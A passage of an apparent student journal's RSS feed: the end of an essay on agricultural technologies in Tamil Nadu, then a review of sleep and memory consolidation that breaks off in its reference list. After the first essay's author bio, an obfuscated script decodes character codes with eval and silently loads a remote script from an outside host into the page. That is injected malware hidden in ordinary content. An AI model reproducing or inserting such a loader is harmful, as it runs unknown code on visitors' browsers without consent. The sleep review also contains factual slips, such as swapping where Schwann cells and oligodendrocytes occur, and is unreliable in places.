<p>There are mobile applications that provide latest agricultural information about trends, equipment, technologies and methods being used, help identify pests and diseases, provide real-time data about weather, early warnings about storms, local markets offering best prices, seeds, fertilizers etc. In addition, farmers can also interact and get guidance from agriculture experts across the country via the apps. These apps help in providing market information, facilitating market links, providing access to extension services, farm related information etc.<strong><sup>15</sup></strong></p>



<h4 class="wp-block-heading"><strong>CASE STUDY</strong></h4>



<p>About 4,91,811 users of Uzhavan App, launched by Tamil Nadu Agricultural Ministry, educate farmers about soil quality, seeds and fertilizers. FarmMOJO app provides real time solutions for aquaculture, including shrimp and fish farming and this app records data like pH balance, ammonia and nitrate levels and water quality. Tumaini app allows farmers, cultivating banana, to scan plants and detects symptoms on any part of the crop with an accuracy rate of 98%.<strong><sup>16</sup></strong></p>



<h2 class="wp-block-heading"><strong>HYDROPONICS</strong></h2>



<p>Hydroponics is a way to skip the soil and grow crops directly in nutrient-rich water, that gives higher yield with fewer resources.<strong><sup> 17</sup></strong></p>



<h4 class="wp-block-heading"><strong>CASE STUDY</strong></h4>



<p>According to Mr.Srinivasan, a resident of Chennai city, perform commercial hydroponics by growing crops like spinach, kale, and lettuce. With nearly 250 plants across 50 square feet, Rahul Dhoka runs Acqua Farms in Chennai city. The rate of crop growth is around 30 to 40 per cent faster and have a 30 to 40 per cent higher yield, than soil-based agriculture, with a less cost of production ie-lettuce costs Rs 15 to 17 per kg, and basil costs Rs 20 to 25 per kg.<strong><sup> 18</sup></strong></p>



<h2 class="wp-block-heading"><strong>SOIL MOISTURE INDICATOR</strong></h2>



<p>Soil moisture indicator has sensors to detect the soil moisture content for proper development of plants and notify the user when the soil gets too dry or too wet.<strong><sup>19</sup></strong> This device works based on the principle that electrical conductivity of the soil is directly proportional to soil moisture or soil electrical resistance is indirectly proportional to soil moisture content.<strong><sup>20.&nbsp; </sup></strong>It is suitable for different types of soils and can be used in nurseries, farms, potted plants, etc.<strong><sup>21</sup></strong></p>



<h4 class="wp-block-heading"><strong>CASE STUDY</strong></h4>



<p>The Soil Moisture Indicator, a handy and user-friendly electronic moisture–indicating device, was first launched at Sugarcane Breeding Institute at Coimbatore city, Tamil Nadu, which is used for the efficient irrigation management practices such as irrigation-scheduling, particularly in sugarcane fields, that helps the farmers in deciding when to irrigate their fields and as a result there would be considerable saving of irrigation water. The sensor rods of the device need to be inserted into the soil to a required depth to assess the soil moisture, which is indicated by glowing LEDs and the device is suitable for use in agricultural farms as well as in potted plants.<strong><sup>22</sup></strong></p>



<h2 class="wp-block-heading"><strong>RFID TECHNOLOGY</strong></h2>



<p>Radio Frequency Identification Technology offers monitoring systems, which protects the crops from pests and wireless sensors can be used to monitor cattle. It uses dedicated software and hardware to monitor livestock management.<strong><sup>23&nbsp; </sup></strong>It supports Animal population trackingand Animal data base monitoring.<strong><sup>24</sup></strong></p>



<h4 class="wp-block-heading"><strong>CASE STUDY</strong></h4>



<p> “Mr. Vijaykumar, Perambalur district, Tamil Nadu, relies on computerisation to monitor the dairy along with the 60 staff who stay on the farm. Each animal has a blue-collar tag with a unique microchip number. “Of the 368 cows here, 160 are used for milking and the microchip helps us not just to track each cow’s health and daily milk output, but also to decide if it can be selected for breeding in future.<strong><sup>25</sup></strong></p>



<h2 class="wp-block-heading"><strong>CONCLUSION:</strong></h2>



<p>The agriculture technologies have changed almost all the domains of farming from sowing to harvesting. These technologies are continued to evolve and invent new innovations that act as catalyst to ameliorate farmers’ life by increasing incoming and providing the access to research stations and agro-scientists.&nbsp; The use of technology can make farmers feel more empowered and enable them to adopt required measures in needful time. It has potential capabilities to transform agriculture into a better prospect to get aware of climatic change and appropriate use of limited natural resources in agricultural land.<strong><sup>26</sup></strong> However technologies like hydroponics; drone farming; use of mobile applications and IOT based devices had get tremendous success in Tamil Nadu. Many government organizations and private bodies are working on to give a clear view about new technologies to the farmers of Tamil Nadu, like robotic farming, chromosomal technique and application of remote sensing etc… which are practiced globally.</p>



<h2 class="wp-block-heading"><strong>REFERENCES</strong></h2>



<ol class="wp-block-list"><li><a href="https://www.economist.com/technology-quarterly/2016-06-09/factory-fresh">https://www.economist.com/technology-quarterly/2016-06-09/factory-fresh</a></li><li><a href="https://www.raconteur.net/sustainability/top-5-tech-innovations-in-agriculture/">https://www.raconteur.net/sustainability/top-5-tech-innovations-in-agriculture/</a></li><li><a href="https://www.agrifarming.in/agriculture-farming-in-tamil-nadu-cultivation-practices">https://www.agrifarming.in/agriculture-farming-in-tamil-nadu-cultivation-practices</a></li><li><a href="https://www.aeris.com/news/post/five-iot-applications-that-are-reshaping-agriculture-technology/">https://www.aeris.com/news/post/five-iot-applications-that-are-reshaping-agriculture-technology/</a></li><li><a href="https://www.biz4intellia.com/blog/5-applications-of-iot-in-agriculture/">https://www.biz4intellia.com/blog/5-applications-of-iot-in-agriculture/</a></li><li><a href="https://www.sciencedirect.com/topics/earth-and-planetary-sciences/precision-agriculture">https://www.sciencedirect.com/topics/earth-and-planetary-sciences/precision-agriculture</a></li><li><a href="https://www.downtoearth.org.in/blog/agriculture/why-farmers-today-need-to-take-up-precision-farming-64659">https://www.downtoearth.org.in/blog/agriculture/why-farmers-today-need-to-take-up-precision-farming-64659</a></li><li><a href="https://icar.org.in/node/8077">https://icar.org.in/node/8077</a></li><li><a href="https://www.conserve-energy-future.com/organic-farming-benefits.php">https://www.conserve-energy-future.com/organic-farming-benefits.php</a></li><li><a href="https://agritech.tnau.ac.in/org_farm/orgfarm_success%2520stories.html">https://agritech.tnau.ac.in/org_farm/orgfarm_success%20stories.html</a></li><li><a href="https://blog.agrivi.com/post/powerful-role-of-drones-in-agriculture_april2018">https://blog.agrivi.com/post/powerful-role-of-drones-in-agriculture_april2018</a></li><li><a href="https://timesofindia.indiatimes.com/city/coimbatore/reaping-rich-dividends-with-drones/articleshow/71382745.cms">https://timesofindia.indiatimes.com/city/coimbatore/reaping-rich-dividends-with-drones/articleshow/71382745.cms</a></li><li><a href="https://www.iotforall.com/iot-applications-in-agriculture">https://www.iotforall.com/iot-applications-in-agriculture</a></li><li><a href="https://www.edexlive.com/campus/2020/sep/29/tn-students-develop-smart-farming-solutions-for-automatedpest-control-and-plant-watering-14868.html">https://www.edexlive.com/campus/2020/sep/29/tn-students-develop-smart-farming-solutions-for-automatedpest-control-and-plant-watering-14868.html</a></li><li><a href="https://www.manage.gov.in/publications/edigest/dec2017.pdf">https://www.manage.gov.in/publications/edigest/dec2017.pdf</a></li><li><a href="https://m.timesofindia.com/city/chennai/click-cure-tech-helps-farmers-reap-a-bounty/amp_articleshow/71284085.cms">https://m.timesofindia.com/city/chennai/click-cure-tech-helps-farmers-reap-a-bounty/amp_articleshow/71284085.cms</a></li><li><a href="https://www.verticalroots.com/the-what-and-why-of-hydroponic-farming/">https://www.verticalroots.com/the-what-and-why-of-hydroponic-farming/</a></li><li><a href="https://www.dtnext.in/News/City/2019/12/10052809/1202790/Hydroponic-farming-helps-Chennaiites-grow-greens-at-.vpf">https://www.dtnext.in/News/City/2019/12/10052809/1202790/Hydroponic-farming-helps-Chennaiites-grow-greens-at-.vpf</a></li><li><a href="https://link.springer.com/chapter/10.1007/978-981-15-5113-0_55">https://link.springer.com/chapter/10.1007/978-981-15-5113-0_55</a></li><li><a href="https://sugarcane.icar.gov.in/index.php/en/home/1157-soil-moisture-indicator">https://sugarcane.icar.gov.in/index.php/en/home/1157-soil-moisture-indicator</a></li><li><a href="http://www.techsourcesolutions.in/manufacturing/soil-moisture-indicator/">http://www.techsourcesolutions.in/manufacturing/soil-moisture-indicator/</a></li><li><a href="http://sugarcane100.blogspot.com/2016/01/soil-moisture-indicator-launched.html?m=1">http://sugarcane100.blogspot.com/2016/01/soil-moisture-indicator-launched.html?m=1</a></li><li><a href="https://agritechsupport.com/agriculture-technology/radio-frequency-identification-technology-in-agriculture/">https://agritechsupport.com/agriculture-technology/radio-frequency-identification-technology-in-agriculture/</a></li><li><a href="https://academic.oup.com/jas/article-abstract/97/Supplement_2/1/5541113">https://academic.oup.com/jas/article-abstract/97/Supplement_2/1/5541113</a></li><li><a href="https://www.thehindu.com/sci-tech/agriculture/data-analytics-helps-an-integrated-farm-in-arumbavur-village-perambalur-district-to-produce-additive-free-cows-milk/article26888613.ece">https://www.thehindu.com/sci-tech/agriculture/data-analytics-helps-an-integrated-farm-in-arumbavur-village-perambalur-district-to-produce-additive-free-cows-milk/article26888613.ece</a></li><li><a href="https://www.ijcmas.com/10-2-2021/Pradeep%2520Kumar%2520Singh,%2520et%2520al.pdf">https://www.ijcmas.com/10-2-2021/Pradeep%20Kumar%20Singh,%20et%20al.pdf</a></li></ol>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/11/Harnishya-Palanichamy.jpeg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Harnishya Palanichamy</h5><p>Harnishya is currently in Grade 10 at the Hebron School, Ootacamund, Tamil Nadu, India. She’s passionate about the field of computer science, particularly the coding languages, Java and JavaScript. She enjoys coding and researching about AI. She started her coding journey by coding games in JavaScript, and she also has experience with robotics; being in the school robotics club. In the future, she wants to develop her coding knowledge by creating more complex apps.
</p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/technologies-reshaping-agriculture-in-tamil-nadu-india/">Technologies Reshaping Agriculture in Tamil Nadu, India</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Brief Review of Sleeping to Enhance Memory Consolidation</title>
		<link>https://exploratiojournal.com/brief-review-of-sleeping-to-enhance-memory-consolidation/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=brief-review-of-sleeping-to-enhance-memory-consolidation</link>
		
		<dc:creator><![CDATA[Ashley Qian]]></dc:creator>
		<pubDate>Tue, 26 Oct 2021 17:32:45 +0000</pubDate>
				<category><![CDATA[Biology]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[biology]]></category>
		<category><![CDATA[memory]]></category>
		<category><![CDATA[sleep]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1432</guid>

					<description><![CDATA[<p>Ashley Qian<br />
Wuxi Big Bridge Academy</p>
<p>The post <a href="https://exploratiojournal.com/brief-review-of-sleeping-to-enhance-memory-consolidation/">Brief Review of Sleeping to Enhance Memory Consolidation</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="611" height="611" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image001.jpeg" alt="" class="wp-image-1433 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image001.jpeg 611w, https://exploratiojournal.com/wp-content/uploads/2021/10/image001-300x300.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image001-150x150.jpeg 150w, https://exploratiojournal.com/wp-content/uploads/2021/10/image001-230x230.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image001-350x350.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image001-480x480.jpeg 480w" sizes="(max-width: 611px) 100vw, 611px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Ashley Qian</strong><br><strong>Mentor: Fabiola Munarin<br></strong><em>Wuxi Big Bridge Academy<br></em>October 1, 2021</p>
</div></div>



<h2 class="wp-block-heading">Abstract&nbsp;</h2>



<p>Sleep has been the center of discussion for scientists over nearly the past century, with compelling evidence that show sleep influences memory consolidation. Nervous systems have specific structures related to distinctive functions, which serves to transform short-term memories into long-term memories, with synapses playing a crucial role. Tests on electrophysiology markers of synaptic efficacy adds proof to the synaptic homeostasis (SHY) hypothesis. During sleep, spontaneous activity renormalizes net synaptic strength and restores cellular homeostasis. Sleep stages and rhythms correspond to 5 types of brain waves respectively, and there are interplays between sleep rhythms and memory consolidation. Explicit memories (associated with neocortex and amygdala), reported by traditional studies, are strengthened during SWS sleep, whereas implicit memory (associated with basal ganglia and cerebellum) mechanisms have been also demonstrated in recent research to be recruited during NREM sleep periods. Experiments have provided evidence that show how individuals reproduce knowledge they learned after retention of several hours after intervals of sleep or wakefulness respectively. Data analysis show that sleep promotes memory consolidation consistently; effects are extremely significant in the situation with declarative memories (syllables).&nbsp; Further research done recently have also come up with the result of brain reactivation during sleep.</p>



<h2 class="wp-block-heading">1. Introduction</h2>



<p>The basics of memory formation involve three stages: encoding, storage, and retrieval. Encoding represents the transformation of sensory inputs into short-term and long-term memories, storage is defined as to maintaining the encoded sensory information over time, whereas retrieval refers to how people get access to the actual memories stored in their brain. Different mechanisms, as well as different brain areas, are triggered when humans are forming and storing memories. For example, short-term memory involves mainly the prefrontal cortex, while long term memory involves the hippocampus, neocortex and amygdala (explicit memory) or the basal ganglia and cerebellum (implicit memory). Explicit memories, which are episodic events and semantic information, together with implicit memories, which involve motor memories, make up long-term memories.&nbsp;</p>



<p>Memory consolidation is the rehearsal of earlier memories resulting in the increasing number of synapses, swelling amount of neurotransmitter released, and enlarging number of receptors on postsynaptic membrane. By consolidation, short-term memories can develop into long-term memories. Memory consolidation is rather significant. It is reported that students on average are able to grasp only 25% of the lecture they are listening to even carefully. The left 75% requires the mechanism of memory consolidation to be in the storehouse where it should be. Hence, teachers are supposed to assign homework and give feedbacks. This can be named as early consolidation practice which is later strengthened by quizzes and examinations.</p>



<p>Over the last decades, scientists have gained compelling evidence that sleep enhances the formation of long-term memories. Traditional theories proposed a passive role for sleep supporting memories by sheltering them from external stimuli, however recent research have uncovered an active role for sleep during memory consolidation. Traditional studies emphasized the role of rapid-eye-movement (REM) sleep, present papers have revealed that slow-wave-sleep (SWS) is also significant (Rasch B, Born J. 2013). Initially, scientists emphasize that sleeping provides shelter for the brain’s memory storage from external stimuli or interferences; yet later researchers put forward that sleep actively involves in system consolidation of memories. In this review, we will summarize about the correlations of sleep and memory consolidation.&nbsp;</p>



<ol class="wp-block-list"><li>Neuron physiology</li><li>Neuronal structures and functions&nbsp;</li></ol>



<p>Neurons (also called nerve cells or neurones) are the fundamental units of the brain and nervous system. They are responsible for receiving input from external world, sending commands to the muscles, and relaying or integrating electrical signals. Most of a neuron’s organelles are in the cell body, with the largest karyoplasmic ratio of approximately 1:1 among all the other cell types.</p>



<p>&nbsp;A useful model is to consider the structure of a neuron as a tree, consisting of three major parts: an axon (tree root), dendrites (tree branches), and a cell body (tree trunk). Long and slender, axons are projections of nerve cells that conducts action potential away from the cell body. The primary function of axons is to transmit signals to target cells. Axons fall into two categories: myelinated and unmyelinated. Myelinated axons are surrounded by segments of a fatty layer of insulating glial cells, namely Schwann cells (in the CNS) and oligodendrocytes (in the PNS). Vacant space in myelin sheath is known as nodes of Ranvier, where action potentials jump along. Due to their lengths, axons can be divided into branches of telodendrions, whose ends are called axon terminals. Axon terminals, as pre-synaptic axons, contain vesicles of neurotransmitters for the relay of electrical signals in the synapses. The post-synaptic dendrites can be easily distinguished by its similar appearances to lushy but short branches. Dendrites receives signals from axons and carries the action potential towards the soma. Dendrite spines are small protrusions that increase the receptive properties of dendrites to isolate signal specificity. Implication of dendrite spines can be seen in long-term potentiation. In other words, the ability of dendritic development plays a crucial role in memory formation. The cell body, the soma, holds nucleus responsible for production of proteins. &nbsp;</p>



<p>The site in the nervous system where signals are relayed is called synapses. As signals can be described as chemical and electrical, so as synapses. In chemical synapses, the electrical signals must first trigger the release of neurotransmitters and next the second messenger or be again converted into electrical signals. While in electrical synapses, currents past through gap junctions directly by inducing voltage changes in the postsynaptic cells. Without the multiple steps used in chemical synapses, electrical ones are special for their rapidity (Cirelli C. 2013).</p>



<p>When not functioning, a neuron has a rest potential of 60-70 mV across its membrane, with the interior more negatively-charged. Opening or closing ion channels in the membrane lead to changes in the potentials. Hyperpolarization is when the membrane potential becomes more negative, with depolarization the opposite. Opening of channels that let potassium cations out or chlorine anions in may results in hyperpolarization. On the other hand, opening of channels that let sodium cations in will cause depolarization. When multiple depolarizing inputs happen at the same time, a large enough depolarization may ultimately lead to an action potential. An action potential is an all-or-none event, which means the stimulus must thrust the threshold of negative 55 mV. At this threshold, sodium cations influxes to increase the potential up to 40mV. Next, influxes stop and potassium cations rush out, causing a rapid fall towards normal resting state. Yet the potassium cations keep flowing out, resulting in a period of undershoot, where even larger potentials are needed to induce another action potential. Eventually, potassium outfluxes stop and the potential returns to -60 to -70 mV, ready for the next cycle. (Reece, J. B., et al, 2011)</p>



<h4 class="wp-block-heading">1.12 Electrophysiology of synapses during wakefulness and sleep</h4>



<p>Electrophysiological markers of synaptic efficacy have been tested in recent decades. The slope of the early response evoked by electrical stimulation delivered within a cell is a classical electrophysiological measure of synaptic strength, with a steeper slope indicating higher synaptic efficiency. A recent study utilized transcranial magnetic stimulation to evoke a response in humans’ frontal cortex. Results have shown that the slope of early responses increased gradually over the period of 18 hours of consisting awareness, and then recover to basic levels after one night of sleep (Cirelli, Chiara,2013). The explanation for such phenomenon has been proposed. The synaptic homeostasis hypothesis (SHY) proposes that sleep is the price the brain pays for plasticity. During a waking episode, learning statistical regularities about the current environment requires strengthening connections throughout the brain. This increases cellular needs for energy and supplies, decreases signal-to-noise ratios, and saturates learning. During sleep, spontaneous activity renormalizes net synaptic strength and restores cellular homeostasis. Activity-dependent down-selection of synapses can also explain the benefits of sleep on memory acquisition, consolidation, and integration (Tononi, G, et al, 2014).</p>



<ol class="wp-block-list"><li>Correlations between sleep and memory consolidation</li><li>Sleep stages and brain waves</li></ol>



<p>As measured by eletroencephalography (EEG), the brain’s electrical activity is determined by the presence of brain waves, which fall into 5 categories: Gamma, Beta, Alpha, Theta and Delta waves. Gamma waves, are small-amplitude high-frequency (25-140 Hz) ones related to hyper brain activity, such as problem solving and high-concentration tasks. Beta waves (14-25 HZ) possess both lower amplitude and frequency traits and are generated when the brain is busily engaged in activities and conversation. Alpha waves (7.5-13 Hz); Theta waves (3.5-7.5 Hz) and Delta waves (3Hz or below) are all associated with rest, sleep and dreaming activities.&nbsp;</p>



<p>During the approximately 90-minute-long sleep cycle, non-REM sleep first appears and rapid-eye-movement sleep (REM) follows. The sleep cycle has four stages, that are characterized by the presence of different brain waves. Stage 1 represents the transition step between wakefulness and sleep, in which the brain generates Alpha waves.  The following stage 2 is where Theta waves, K-Complex and sleep spindle waves alternate as responses and inhibition towards outside stimuli. While progressing to stage 3 and 4 sleep, people are drifting down into deeper sleep, and the brain emits Delta waves. Finally, people fall into stage 5 sleep, or REM sleep, presenting bran waves similar to those of an awake person. In this phase, dreaming occurs and the skeletal muscles experience atonia, and are unable to move. Cycles of slow wave and REM sleep alternate at night, with the slow wave sleep becoming less deep and the REM periods more prolonged until awakening.</p>



<h2 class="wp-block-heading">2. Consolidation during SWS and REM </h2>



<p>Memory consolidation happens during slow wave sleep and REM phase. Slow wave sleep (SWS) periods appear to strengthen explicit memories evidenced by the observations on increased SWS after intensive episodic learning (Acosta MT, 2019). Recent studies on implicit memories during sleep have also demonstrated the recruitment of implicit learning mechanisms during NREM sleep, suggesting that memory consolidation may be optimized when taking into account sleep stages and sleep rhythms (Born J, et al, 2012).&nbsp;</p>



<p>During slow wave sleep, the experienced episodes are stored temporarily in the hippocampus and are then redistributed in a long-term store in the neocortex. The waves generated in this process are hippocampal ripples, thalamocortical spindles and slow waves (delta waves). Originating in the medial temporal lobe, hippocampal ripples have a frequency of 100-300 Hz. Thalamocortical spindles are typical waves for stage 2 and SWS sleep, with a frequency of 10-15 Hz (Gage et al, 2018).  Spindles reaching the neocortex likely act to prime respective neuronal networks, e.g., by stimulating Ca<sup>2+</sup> influx for subsequent synaptic plastic processes. Thus, memory information carried in single troughs of spindle oscillations maybe particularly effective in changing synaptic connections underlying the long-term storage of the information in the respective neocortical networks (Born et al, 2012). The third key SWS oscillation are the slow waves (0.5 – 4Hz). Slow waves are considered to reflect the brain’s up-and-down states, which is critical for memory redistribution, i.e., the encoding of information. The more information is encoded during wakefulness the higher amplitude of the slow oscillations is generated over respective cortical areas during succeeding SWS（Schonauer, et al. 2014).  A major function of the slow oscillations is that they temporally group neuronal activity into hyperpolarizing down-states during which neurons are globally silent and succeeding depolarizing up-states during which neuronal firing is increased to wake-like levels (Steriade et al. 2006). As previously described, the hippocampus, thalamus, and the cortex combine to form the complex neural symphony that corresponds to a key aspect of human SWS: memory stabilization and consolidation.</p>



<h2 class="wp-block-heading">3. Effects of sleep on memory consolidation</h2>



<h4 class="wp-block-heading">3.1 Performance of individual subjects on the LGT-3 total score</h4>



<p>Primary research has found that sleep consistently promotes overall declarative memory consolidation. Forty healthy adults aged 18–30 y, and 17 healthy adults aged 24–55 y with extensive meditation experience participated in the 3 experiments (Schonauer et al, 2014). In Experiment 1, subjects learned Turkish in the afternoon followed by a 2-h sleep, and after a 3-h retention they were tested. Results shown people performing far better after sleep than after wakefulness. There was only one exception that shown better results after an interval of wakefulness. In Experiment 2, volunteers acquired knowledge in the morning, after which they took a 2-h sleep and were tested after 8-h retention. Statistical analysis comported with results from experiment 1, with exception of 2 of 18 subjects (Schonauer et al, 2014).&nbsp; In Experiment 3, procedures were same with Experiment 1 expect for the three states (sleep/active awake/meditation) subjects were kept respectively to compare. Subjects performed better on the test when there were only 3 h between learning and testing&nbsp;than when encoding and testing were spaced 8 h apart. There was still one exception out of 18 subjects. Conclusions were drawn: sleep does improve the consolidation of declarative memories while such effect is reserved only to sleep, and does not happen in the case of wakefulness.&nbsp;</p>



<h4 class="wp-block-heading">3.2 Significant improvements on syllable memories&nbsp;</h4>



<p>Two OS, L. R. Hodell and J. S. McGraw served as subjects and were required to learn meaningless syllables in series of ten by reading aloud, with exposure at the rate of 0.7 sec (Jenkins et al. 2021). The series were repeated by the subjects until they completely remembered the syllables. The experiment was carried out at night, when subjects go to bed after learning. They were separately waked by Ebbinghaus, the scientist, to give reproduction of the syllables. Analysis of data shown superiority of the reproductions after intervals of sleep. This superiority became more and more prominent as the length of the intervals elongated (Jenkins et al. 2021).</p>



<h4 class="wp-block-heading">3.3 Improve memory by protection or reactivation of the brain during sleep</h4>



<p>Sleep after learning leads to superior recall of syllables after the 1-, 2-, 4-, and 8-h retention interval, compared with wake intervals of the same length. Two subjects (H. and Mc.) participated in this classic study by Jenkins and Dallenbach. For each data point, each participant completed 6–8 trials, with the different retention intervals performed in random order (Rash et al. 2013). A time dependency of the effects of sleep on memory formation is indicated by studies showing stronger effects for sleep occurring shortly after learning than for sleep at a later time. For example, sleep occurring within 3-h after learning vocabulary was more beneficial than sleep delayed by more than 10 h. Furthermore, recall of word pairs after 24-h was better when sleep occurred immediately after learning than after a day of wakefulness.Whereas initially it was commonly assumed that sleep improves memory in a passive manner, by protecting it from being overwritten by interfering external stimulus inputs, the current theorizing assumes an active consolidation of memories that is specifically established during sleep, and basically originates from the reactivation of newly encoded memory representations (Rash et al. 2013). Maquet and colleagues (Maquet et al. 2000) led first experiments to mark out the activation of brain in learning using PET. Although there have been plenty of current studies on the evidence of reactivation of the brain using PET, fMRI, and EEG, higher resolution images will be needed to determine when and where reactivations occur.&nbsp;</p>



<h2 class="wp-block-heading">Conclusions</h2>



<p>There’s no deny that sleep is fundamental for memory formation, as proved by studies down recently, which showcased significant enhancements in implicit memories and episodic learning in SWS and REM respectively, syllable learnings being the most evident.&nbsp; However, there’s still great needs for higher resolution images to further decipher the exact mechanisms of latest discovered reactivations during sleeping. &nbsp;</p>



<h2 class="wp-block-heading">References</h2>



<ol class="wp-block-list"><li>Schonauer, Monika et al. “Exploring the effect of sleep and reduced interference on different forms of declarative memory.”&nbsp;<em>Sleep</em>&nbsp;(2014) vol. 37,12 1995-2007.&nbsp;</li><li>Born, Jan, and Ines Wilhelm. “System consolidation of memory during sleep.”&nbsp;<em>Psychological research</em>&nbsp;vol. 76,2 (2012): 192-203.&nbsp;</li><li>Diekelmann, S., Born, J. The memory function of sleep.&nbsp;<em>Nat Rev Neuroscience</em>&nbsp;<strong>11,&nbsp;</strong>114–126 (2010).&nbsp;</li><li>Born J, Wilhelm I. System consolidation of memory during sleep. <em>Psychol</em> <em>Res</em>. 2012 Mar;76(2):192-203.&nbsp;</li><li>Rasch B, Born J. About sleep&#8217;s role in memory. <em>Physiology</em> <em>Rev</em>. 2013 Apr;93(2):681-766.&nbsp;</li><li>Reece, J. B., Urry, L. A., Cain, M. L., Wasserman, S. A., Minorsky, P. V., and Jackson, R. B. (2011). Neurons, synapses, and signaling. In&nbsp;<em>Campbell biology</em>&nbsp;(10th ed., pp. 1061-1078). San Francisco, CA: Pearson.</li><li>Cirelli, Chiara. “Sleep and synaptic changes.”&nbsp;<em>Current opinion in neurobiology</em>&nbsp;vol. 23,5 (2013): 841-6.&nbsp;</li><li>Cirelli C. Sleep and synaptic changes. <em>Current opinion in neurobiology</em>. 2013 Oct;23(5):841-6.&nbsp;</li><li>Tononi, Giulio, and Chiara Cirelli. “Sleep and the price of plasticity: from synaptic and cellular homeostasis to memory consolidation and integration.”&nbsp;<em>Neuron</em>&nbsp;vol. 81,1 (2014): 12-34.&nbsp;</li><li>Acosta MT. Sueño, memorial appendixes [Sleep, memory and learning]. <em>Medicina</em> (<em>B</em> <em>Aires</em>). 2019;79 Suppl 3:29-32.&nbsp;</li><li>Donlea JM. Roles for sleep in memory: insights from the fly. <em>Current opinion in neurobiology.</em> 2019 Feb; 54:120-126.</li><li>Pace-Schott EF, Germain A, Milad MR. Effects of sleep on memory for conditioned fear and fear extinction. <em>Psychol</em> <em>Bull</em>. 2015 Jul;141(4):835-57.&nbsp;</li><li>Diering GH, Nirujogi RS, Roth RH, Worley PF, Pandey A, Huganir RL. Homer1a drives homeostatic scaling-down of excitatory synapses during sleep. <em>Science</em>. 2017 Feb 3;355(6324):511-515.&nbsp;</li><li>Acsady L, Harris KD. Synaptic scaling in sleep. <em>Science</em>. 2017 Feb 3;355(6324):457.</li><li>Rasch Bjorn, Born Jan. “About Sleep’s Role in Memory.”<em> Physiological Reviews vol</em>. 93, No. 2. 2013 Apr.</li><li>Jenkins, John G., and Karl M. Dallenbach. “Obliviscence during Sleep and Waking.”&nbsp;<em>The American Journal of Psychology</em>, vol. 35, no. 4, 1924, pp. 605–612.&nbsp;</li><li>Azarfar A, Calcini N, Huang C, Zeldenrust F, Celikel T. Neural coding: A single neuron&#8217;s perspective. Neurosci Biobehav Rev. 2018 Nov;94:238-247.</li><li>Reuveni I, Barkai E. Tune it in: mechanisms and computational significance of neuron-autonomous plasticity. J Neurophysiol. 2018 Oct 1;120(4):1781-1795.</li><li>Verkhratsky A, Ho MS, Parpura V. Evolution of Neuroglia. Adv Exp Med Biol. 2019;1175:15-44.</li><li>Stiefel KM, Ermentrout GB. Neurons as oscillators. J Neurophysiol. 2016 Dec 1;116(6):2950-2960.&nbsp;</li><li>Berry KP, Nedivi E. Spine Dynamics: Are They All the Same? Neuron. 2017 Sep 27;96(1):43-55.</li><li>Choquet D, Triller A. The dynamic synapse. Neuron. 2013 Oct 30;80(3):691-703.</li><li>Fabricant A, Iwata GZ, Scherzer S, Bougas L, Rolfs K, Jodko-Władzińska A, Voigt J, Hedrich R, Budker D. Action potentials induce biomagnetic fields in carnivorous Venus flytrap plants. Sci Rep. 2021 Jan 14;11(1):1438.&nbsp;</li><li>Fields RD. Oligodendrocytes changing the rules: action potentials in glia and oligodendrocytes controlling action potentials. Neuroscientist. 2008 Dec;14(6):540-3.</li><li>Xie C, Lin Z, Hanson L, Cui Y, Cui B. Intracellular recording of action potentials by nanopillar electroporation. Nat Nanotechnol. 2012 Feb 12;7(3):185-90. doi:</li><li>Ackermann S, Rasch B. Differential effects of non-REM and REM sleep on memory consolidation? Curr Neurol Neurosci Rep. 2014 Feb;14(2):430.</li><li>Gottesmann C. Detection of seven sleep-waking stages in the rat. Neurosci Biobehav Rev. 1992 Spring;16(1):31-8.</li><li>Rotenberg VS. Sleep and memory. I: The influence of different sleep stages on memory. Neurosci Biobehav Rev. 1992 